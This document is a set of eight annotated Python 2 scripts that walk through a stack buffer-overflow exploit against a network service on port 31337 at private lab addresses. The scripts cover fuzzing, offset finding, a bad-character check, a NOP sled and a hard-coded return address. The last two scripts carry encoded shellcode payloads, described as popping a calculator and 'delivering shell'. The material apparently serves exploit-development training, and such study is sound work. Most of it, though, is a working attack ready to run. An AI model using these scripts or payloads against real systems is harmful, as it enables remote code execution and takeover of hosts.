Scripts
Buffer-overflow (BOF) script sample methodology
#!/usr/bin/python
"""Stage 1 of the methodology: a plain connectivity check.

Opens one TCP connection to RHOST:RPORT, sends two newline-terminated test
strings and prints whatever the service answers.  Python 2 syntax (print
statements); host and port are hard-coded.
"""
import socket
RHOST='192.168.132.128'  # target address (private lab range)
RPORT=31337              # target service port (not POP3 -- the older comments here were stale)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nTesting..."
    s.connect((RHOST,RPORT)) # TCP connect to RHOST:RPORT
    s.send('String test1\n') # first newline-terminated test string
    data = s.recv(1024) # read up to 1024 bytes of reply (blocks; no timeout is set)
    print data # show the reply
    s.send('String test2\n') # second newline-terminated test string
    data = s.recv(1024) # read up to 1024 bytes of reply
    print data # show the reply
    s.close() # only reached on the happy path; an exception above leaves the socket open until exit
    print "\nDone!"
except:
    # NOTE(review): bare except catches everything (KeyboardInterrupt, send/recv
    # errors, ...), so this message is also printed for failures other than connect.
    print "--Could not connect--"
#!/usr/bin/python
"""Stage 2: length fuzzing.

Sends progressively longer runs of 'A' to the service, one connection per
payload, and stops at the first exception.  Python 2 only (print statements).
"""
import socket
RHOST='192.168.132.128'
RPORT=31337
buffer=["A"]  # first payload is a single byte (note: shadows the Python 2 builtin `buffer`)
counter=50    # length of the next payload; grows by 50 each step
try:
    # Grow the list until it holds 31 entries: "A", then 50, 100, ..., 1500 bytes.
    while len(buffer) <= 30:
        buffer.append("A"*counter)
        counter=counter+50
    for string in buffer:
        print "Fuzzing PASS with %s bytes" % len(string)
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect((RHOST,RPORT)) # connect() returns None; `connect` is never read
        s.send(string+'\n')
        data = s.recv(1024) # reply is read but not used; blocks with no timeout
        s.close() # skipped if send/recv raises; the except below then ends the whole run
except:
    # NOTE(review): bare except -- any error (connection refused, reset, Ctrl-C) ends
    # the loop here.  The last "Fuzzing PASS" line printed marks where the service
    # stopped answering; the length that actually triggered it may be that one or
    # the one before it, depending on whether recv raised or the next connect failed.
    print "--Could not connect--"
#!/usr/bin/python
"""Stage 3: send a 150-byte non-repeating pattern (Aa0Aa1...Ae9).

Because no 4-byte window repeats, a value observed in a crash can be located
within the pattern.  Python 2 only (print statements).
"""
import socket
RHOST='192.168.132.128'
RPORT=31337
buffer=""
# 5 letters x 10 digits x 3 chars = 150 bytes
buffer+=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9")
try:
    print "Fuzzing PASS with a Pattern..."
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((RHOST,RPORT)) # connect() returns None; `connect` is never read
    print "-connected-"
    s.send(buffer+'\n')
    data = s.recv(1024) # reply is read but not used; blocks with no timeout
    s.close() # skipped if send/recv raises
except:
    # NOTE(review): bare except -- printed for any failure, not only a refused connect.
    print "--Could not connect--"
#!/usr/bin/python
"""Stage 4: confirm the offset.

Sends 146 bytes of 'A' followed by 'BBBB'; if the offset from the pattern
stage is right, the four 'B' bytes (0x42424242) are what overwrites the
saved return address.  Python 2 only (print statements).
"""
import socket
RHOST='192.168.132.128'
RPORT=31337
buffer="A"*146 + "BBBB"  # 150 bytes total: 146-byte filler + 4 marker bytes
try:
    print "Fuzzing PASS with a Pattern..." # message left over from the pattern script
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((RHOST,RPORT)) # connect() returns None; `connect` is never read
    print "-connected-"
    s.send(buffer+'\n')
    data = s.recv(1024) # reply is read but not used; blocks with no timeout
    s.close() # skipped if send/recv raises
except:
    # NOTE(review): bare except -- printed for any failure, not only a refused connect.
    print "--Could not connect--"
#!/usr/bin/python
"""Stage 5: check how much room follows the overwritten return address.

Builds filler + 4 marker bytes + 4 more bytes, then pads with 'D' so the
whole buffer is exactly 1500 bytes.  Python 2 only (print statements).
"""
import socket
RHOST='192.168.132.128'
RPORT=31337
filler = "A"*146   # bytes before the saved return address (offset found in stage 3/4)
eip = "BBBB"       # 4 bytes that land on the saved return address
offset = "C"*4     # 4 bytes immediately after it
buffer = filler + eip + offset
buffer +="D"*(1500-len(filler+eip+offset)) # 1346 'D' bytes -> len(buffer) == 1500 (the author's ~1500 target)
try:
    print "Fuzzing PASS with a Pattern..." # message left over from the pattern script
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((RHOST,RPORT)) # connect() returns None; `connect` is never read
    print "-connected-"
    s.send(buffer+'\n')
    data = s.recv(1024) # reply is read but not used; blocks with no timeout
    s.close() # skipped if send/recv raises
except:
    # NOTE(review): bare except -- printed for any failure, not only a refused connect.
    print "--Could not connect--"
#!/usr/bin/python
"""Stage 6: bad-character check.

Sends filler + marker + every byte value 0x01..0xff except 0x0a, so the
bytes the service alters or truncates can be spotted in the crash dump.
Python 2 only (print statements).
"""
import socket
RHOST='192.168.132.128'
RPORT=31337
filler = "A"*146   # bytes before the saved return address
eip = "BBBB"       # 4 bytes that land on the saved return address
offset = "C"*4     # 4 bytes immediately after it
buffer = filler + eip + offset
# All byte values 0x01-0xff in order; 0x00 and 0x0a are deliberately left out
# (0x0a is the terminator this script itself appends with '\n' below).
buffer += (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
# bad characters found by the author: \x00 \x0a
try:
    print "Fuzzing PASS with a Pattern..." # message left over from the pattern script
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((RHOST,RPORT)) # connect() returns None; `connect` is never read
    print "-connected-"
    s.send(buffer+'\n')
    data = s.recv(1024) # reply is read but not used; blocks with no timeout
    s.close() # skipped if send/recv raises
except:
    # NOTE(review): bare except -- printed for any failure, not only a refused connect.
    print "--Could not connect--"
#!/usr/bin/python
"""Stage 7: proof-of-concept payload (the author's message says "Poping Calc").

Same layout as the earlier stages, but the 4 marker bytes are replaced by a
fixed address and the trailing bytes by a payload.  Python 2 only: `print`
statements, and the b"..." literals are plain str in Python 2 (under
Python 3 `str + bytes` would raise TypeError).
"""
import socket
RHOST='192.168.132.130'  # NOTE: a different host than the earlier stages (.128)
RPORT=31337
filler = "A"*146               # bytes before the saved return address
eip = "\xc3\x14\x04\x08"       # little-endian 0x080414c3; hard-coded absolute address,
                               # so this only holds for a non-PIE/non-ASLR build of the target -- not verified here
offset = "\x90"*15             # 15 x 0x90 (x86 NOP) ahead of the payload bytes
buffer = filler + eip + offset
# Payload bytes as given by the author; not analysed here.
buffer += b"\xdb\xc5\xb8\x8d\x08\xf9\x13\xd9\x74\x24\xf4\x5a"
buffer += b"\x2b\xc9\xb1\x31\x31\x42\x18\x03\x42\x18\x83\xc2"
buffer += b"\x89\xea\x0c\xef\x79\x68\xee\x10\x79\x0d\x66\xf5"
buffer += b"\x48\x0d\x1c\x7d\xfa\xbd\x56\xd3\xf6\x36\x3a\xc0"
buffer += b"\x8d\x3b\x93\xe7\x26\xf1\xc5\xc6\xb7\xaa\x36\x48"
buffer += b"\x3b\xb1\x6a\xaa\x02\x7a\x7f\xab\x43\x67\x72\xf9"
buffer += b"\x1c\xe3\x21\xee\x29\xb9\xf9\x85\x61\x2f\x7a\x79"
buffer += b"\x31\x4e\xab\x2c\x4a\x09\x6b\xce\x9f\x21\x22\xc8"
buffer += b"\xfc\x0c\xfc\x63\x36\xfa\xff\xa5\x07\x03\x53\x88"
buffer += b"\xa8\xf6\xad\xcc\x0e\xe9\xdb\x24\x6d\x94\xdb\xf2"
buffer += b"\x0c\x42\x69\xe1\xb6\x01\xc9\xcd\x47\xc5\x8c\x86"
buffer += b"\x4b\xa2\xdb\xc1\x4f\x35\x0f\x7a\x6b\xbe\xae\xad"
buffer += b"\xfa\x84\x94\x69\xa7\x5f\xb4\x28\x0d\x31\xc9\x2b"
buffer += b"\xee\xee\x6f\x27\x02\xfa\x1d\x6a\x48\xfd\x90\x10"
buffer += b"\x3e\xfd\xaa\x1a\x6e\x96\x9b\x91\xe1\xe1\x23\x70"
buffer += b"\x46\x0d\xc6\x51\xb2\xa6\x5f\x30\x7f\xab\x5f\xee"
buffer += b"\x43\xd2\xe3\x1b\x3b\x21\xfb\x69\x3e\x6d\xbb\x82"
buffer += b"\x32\xfe\x2e\xa5\xe1\xff\x7a\xc6\x64\x6c\xe6\x27"
buffer += b"\x03\x14\x8d\x37"
# bad characters found in stage 6: \x00 \x0a
try:
    print "Poping Calc..."
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((RHOST,RPORT)) # connect() returns None; `connect` is never read
    print "-connected-"
    s.send(buffer+'\n')
    data = s.recv(1024) # reply is read but not used; blocks with no timeout
    s.close() # skipped if send/recv raises
except:
    # NOTE(review): bare except -- printed for any failure, not only a refused connect.
    print "--Could not connect--"
#!/usr/bin/python
"""Stage 8: final payload (the author's message says "Delivering shell").

Identical layout to stage 7 -- same filler, same fixed address, same 15-byte
0x90 run -- with a different, longer payload.  Python 2 only: `print`
statements, and the b"..." literals are plain str in Python 2 (under
Python 3 `str + bytes` would raise TypeError).
"""
import socket
RHOST='192.168.132.130'  # NOTE: a different host than stages 1-6 (.128)
RPORT=31337
filler = "A"*146               # bytes before the saved return address
eip = "\xc3\x14\x04\x08"       # little-endian 0x080414c3; hard-coded absolute address,
                               # so this only holds for a non-PIE/non-ASLR build of the target -- not verified here
offset = "\x90"*15             # 15 x 0x90 (x86 NOP) ahead of the payload bytes
buffer = filler + eip + offset
# Payload bytes as given by the author; not analysed here.
buffer += b"\xdb\xd0\xd9\x74\x24\xf4\xba\x39\xd7\xb6\xf1\x5e"
buffer += b"\x2b\xc9\xb1\x52\x31\x56\x17\x83\xee\xfc\x03\x6f"
buffer += b"\xc4\x54\x04\x73\x02\x1a\xe7\x8b\xd3\x7b\x61\x6e"
buffer += b"\xe2\xbb\x15\xfb\x55\x0c\x5d\xa9\x59\xe7\x33\x59"
buffer += b"\xe9\x85\x9b\x6e\x5a\x23\xfa\x41\x5b\x18\x3e\xc0"
buffer += b"\xdf\x63\x13\x22\xe1\xab\x66\x23\x26\xd1\x8b\x71"
buffer += b"\xff\x9d\x3e\x65\x74\xeb\x82\x0e\xc6\xfd\x82\xf3"
buffer += b"\x9f\xfc\xa3\xa2\x94\xa6\x63\x45\x78\xd3\x2d\x5d"
buffer += b"\x9d\xde\xe4\xd6\x55\x94\xf6\x3e\xa4\x55\x54\x7f"
buffer += b"\x08\xa4\xa4\xb8\xaf\x57\xd3\xb0\xd3\xea\xe4\x07"
buffer += b"\xa9\x30\x60\x93\x09\xb2\xd2\x7f\xab\x17\x84\xf4"
buffer += b"\xa7\xdc\xc2\x52\xa4\xe3\x07\xe9\xd0\x68\xa6\x3d"
buffer += b"\x51\x2a\x8d\x99\x39\xe8\xac\xb8\xe7\x5f\xd0\xda"
buffer += b"\x47\x3f\x74\x91\x6a\x54\x05\xf8\xe2\x99\x24\x02"
buffer += b"\xf3\xb5\x3f\x71\xc1\x1a\x94\x1d\x69\xd2\x32\xda"
buffer += b"\x8e\xc9\x83\x74\x71\xf2\xf3\x5d\xb6\xa6\xa3\xf5"
buffer += b"\x1f\xc7\x2f\x05\x9f\x12\xff\x55\x0f\xcd\x40\x05"
buffer += b"\xef\xbd\x28\x4f\xe0\xe2\x49\x70\x2a\x8b\xe0\x8b"
buffer += b"\xbd\x74\x5c\x17\xbc\x1d\x9f\x17\x8f\xe4\x16\xf1"
buffer += b"\x85\x06\x7f\xaa\x31\xbe\xda\x20\xa3\x3f\xf1\x4d"
buffer += b"\xe3\xb4\xf6\xb2\xaa\x3c\x72\xa0\x5b\xcd\xc9\x9a"
buffer += b"\xca\xd2\xe7\xb2\x91\x41\x6c\x42\xdf\x79\x3b\x15"
buffer += b"\x88\x4c\x32\xf3\x24\xf6\xec\xe1\xb4\x6e\xd6\xa1"
buffer += b"\x62\x53\xd9\x28\xe6\xef\xfd\x3a\x3e\xef\xb9\x6e"
buffer += b"\xee\xa6\x17\xd8\x48\x11\xd6\xb2\x02\xce\xb0\x52"
buffer += b"\xd2\x3c\x03\x24\xdb\x68\xf5\xc8\x6a\xc5\x40\xf7"
buffer += b"\x43\x81\x44\x80\xb9\x31\xaa\x5b\x7a\x51\x49\x49"
buffer += b"\x77\xfa\xd4\x18\x3a\x67\xe7\xf7\x79\x9e\x64\xfd"
buffer += b"\x01\x65\x74\x74\x07\x21\x32\x65\x75\x3a\xd7\x89"
buffer += b"\x2a\x3b\xf2"
# bad characters found in stage 6: \x00 \x0a
try:
    print "Delivering shell..."
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((RHOST,RPORT)) # connect() returns None; `connect` is never read
    print "-connected-"
    s.send(buffer+'\n')
    data = s.recv(1024) # reply is read but not used; blocks with no timeout
    s.close() # skipped if send/recv raises
except:
    # NOTE(review): bare except -- printed for any failure, not only a refused connect.
    print "--Could not connect--"